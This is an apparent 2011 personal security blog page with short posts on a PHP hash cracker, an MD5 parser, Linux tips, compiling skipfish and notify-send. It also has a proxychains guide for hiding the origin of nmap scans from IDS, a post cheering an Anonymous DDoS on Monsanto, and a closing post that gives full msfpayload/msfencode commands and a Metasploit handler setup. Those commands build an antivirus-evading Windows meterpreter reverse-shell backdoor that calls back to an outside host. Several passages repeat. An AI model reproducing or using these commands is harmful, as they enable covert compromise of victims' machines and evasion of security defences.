Well, I've moved from Java to C++ untill I had got more interested in web security... which led me to stray away from C++ and learn some web dev. Right now I'm learning PHP, and in the process made this simple hash cracker. Below you can find the source and a very basic dictionary ( Approx. 19mb), for testing purposes. You can check out the working version hosted here, if I make and updates to it (such as supplying a hash list instead of a single hash) than I'll update this page or make a new post.
Source
Example
Monday, June 27, 2011
Tuesday, June 21, 2011
Java MD5 parser
Well, I don't code in Java much anymore but I had encountered a task which involved isolating MD5 hash's from a rather large text file, which would have been a pain in the ass to do manually. In addition, I tried awk, grep and sed a bit. They all worked to a lesser degree, but not quite what I was looking for. So I remembered the Java IP parser I coded for parsing nmap logs and pulling the IPs, so I just altered the regex to pull MD5's instead and write them to a file rather than IPs. So because I found it rather helpful, I decided to make a quick post and link the new source and jar file.
I think sed could have actually done the job but I wasn't having any luck and this alternative was extremely easy and quick. Plus it does exactly what I needed.
Source - http://pastebin.com/YhS7J4bC
Usage;
Saturday, June 18, 2011
Adding fluxbox styles.
I've had a few people ask me how to change their fluxbox theme, so I've decided to make a quick how-to on adding styles, which is very easy.
First off, know your fluxbox styles are stored in "/usr/shares/fluxbox/styles"
So all you have to do is download your theme of choice and extract it into the themes folder. Now the new style should be listed in the fluxbox settings.
Compiling skipfish and fixing errors.
iWell, this is the second time I'm writing this... so this one will be a bit more brief, I had encountered some issues when installing the latest version of skipfish on my desktop, one involving "idna.h" and the other a whole plethora of ssl related issues. With some googling I solved the issue, so I've decided to make a quick post to help others who want to install this tool or have encountered the same error as I had.
These two issues I had could be solved by downloading the following packages, but we will want to update first of course.
sudo apt-get update
sudo apt-get install libssl-dev && sudo apt-get install libidn11-dev
Now we will proceed on to downloading the source for those who have just come across this to compile it, or whatever the case may be.
wget http://skipfish.googlecode.com/files/skipfish-1.94b.tgz
tar -xvzf skipfish-1.94b.tgz
cd ./skipfish-1.94b
make
Now you should have successfully compiled yourself a working skipfish binary which can be used like so;
./skipfish -h
Friday, June 17, 2011
Find a file and its directory in linux
Okay this is a quick tip, which a lot of you guys probably know, but I forgot about it untill just now. I always find myself in a situation where I need to find a files location but can't seem to locate it, at which point I resort to google. But a quicker and easier way to do this is the "whereis" command.
conky: /usr/bin/conky /etc/conky /usr/lib/conky /usr/share/man/man1/conky.1.gz
Alternatively you could use the find command.
~ # find / -iname conky
/etc/conky
/usr/bin/conky
/usr/share/doc/conky
/usr/lib/conky
Monday, June 13, 2011
Anonymous nmap scans
This is an extremely simple tutorial on how you can use "proxychains" to anonymize your nmap scans, or to trip the IDS/Firewalls with multiple IPs to mask which one you really are. First, proceed to the following link to download the proxychains package.
http://prdownloads.sourceforge.net/proxychains/proxychains-3.1.tar.gz?download
Now we need to extract it's contents with the "tar" command so that we can configure it and compile it.
~ $ tar -xvzf proxychains-3.1.tar.gz
That will extract it to your root directory, now we will "cd" into that directory and configure it, then compile it.
./configure
make install
Now you'll have proxychains configured for you system and have compiled a binary. Before you can use it you must configure it, unless you're using tor, which is it's default setting - socks5 127.0.0.1 9050.
nano proxychains.conf
At this point you will want to scroll down to the bottom of the file, which is where you will configure which proxies and what type they are. You can find proxies at one of the following links at the bottom of this site.
For example the default should look like this;
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
So, if you're using tor than you can just leave it, or add more proxies in the chain. Say I wanted to add an http proxy to the chain, I would edit the config file like so.
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
So, if you're using tor than you can just leave it, or add more proxies in the chain. Say I wanted to add an http proxy to the chain, I would edit the config file like so.
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
http 189.47.194.196 8080
Now, you're ready to use it. You can run a tool through proxychains like this;
And that about wraps it up for this quick how-to on anonymizing nmap scans.
./proxychains nmap 199.66.1.11
And that about wraps it up for this quick how-to on anonymizing nmap scans.
Sunday, June 12, 2011
Anonymous targets Monsanto
Well, it looks like Monsanto was recently in anons scope, being hit with a DDoS that was said to have lasted over 60 hours. There was also vulnerabilities found such as SQLi on their foreign sites though their focus seemed to have been on DoSing monsanto.com
As I write this, their site still remains to be down due to the Dos anon was so nice as to supply. It seems even anon realizes monsanto is a terrible corporation whose main goal is complete control of the food supply. As Henry Kissinger once said, "If you control the oil you control the country; if you control food, you control the people."
I really hope the population wakes up and gets a grip on reality, rather than this material illusion the general publics subcumb to.
I'm glad the hacking community takes notice of Monsanto and their dirty ways, rather the cracking a tin foil hat joke while stuffing their face with genetically modified chips covered in MSG and watching television.
As I write this, their site still remains to be down due to the Dos anon was so nice as to supply. It seems even anon realizes monsanto is a terrible corporation whose main goal is complete control of the food supply. As Henry Kissinger once said, "If you control the oil you control the country; if you control food, you control the people."
I really hope the population wakes up and gets a grip on reality, rather than this material illusion the general publics subcumb to.
I'm glad the hacking community takes notice of Monsanto and their dirty ways, rather the cracking a tin foil hat joke while stuffing their face with genetically modified chips covered in MSG and watching television.
Saturday, June 4, 2011
Notify-Send - On Screen text display
To start off, download the following package with your repositories;
apt-get install libnotify-bin
After that you can test it like so;
notify-send "Resist Monsanto"
That will create a popup on your screen displaying the text you entered.
Though that's a big jumbled up on this netbook, so I'm going to pipe it to awk to shorten it a bit and just display what I want to see.
So now that will show me whos logged onto this system and what they're currently doing. I could have this process automated with a while loop in order to have some desired notification displayed to me every however amount of minutes I've chosen. For example;
That would create a pop-up every 10 seconds showing me who's logged on and what they're currently doing. If we wanted something a big longer than a few seconds than you can add a "m" in the sleep command we issued to make it 10 minutes instead.
You can also alter the amount of time the popup is displayed by specifying a time in milliseconds that you'd like it to be displayed before expiring.
notify-send -t 5 "` w | awk '{print $1 " -> " $8}'`"
Another feature of notify-send is the ability to display icons, and a title. This is demonstrated below;
notify-send "Monsanto" "Genetically Modifying People Near YOU" -i /usr/share/pixmaps/terminator.xpm -t 5000
You may not have that icon if you don't have the terminal emulator "terminator" in which case I highly suggest giving a try. It's by far my favorite terminal.
Now that just about covers this brief "how-to" on notify-send, and as you can see there's quite a few things this tool can be used for. I'm sure you'll think of plenty of your own ideas. Feel free to share the things you use notify-send for, and maybe share your own scripts and ideas.
Bypassing Anti-Virus with msfencode.
Well I had recently posted about msfpayload and how to generate a backdoored exe using it. What I left out was msfencode, which is extremely useful because the "unpacked" executable is very likely to be detected by most Anti-Virus. You can find my previous post here.
Now this will pipe the payload to msfecode to be passed through the packer 5 times (-c specifies the amount of times to pass it through the encoder) and it will use the polymorphic xor encryption "shikata ga nai" and output the backdoor as "FuckMonsanto.exe"
You can fire up the handler in metasploit the same way as before, but I would like to add in the fact that you can run things as a "job" which will run in the background by using the "-j" option.
Now lets take what we learned from the last post and pipe the msfpayload command to msfencode.
~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe
msf> use exploit/multi/handler
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(Handler) > set LHOST=19.84.20.11
msf exploit(Handler) > set LPORT=3030
msf exploit(Handler) > exploit -j
Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the job command to see/interact with the jobs running in the background.
Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the job command to see/interact with the jobs running in the background.
Subscribe to:
Posts (Atom)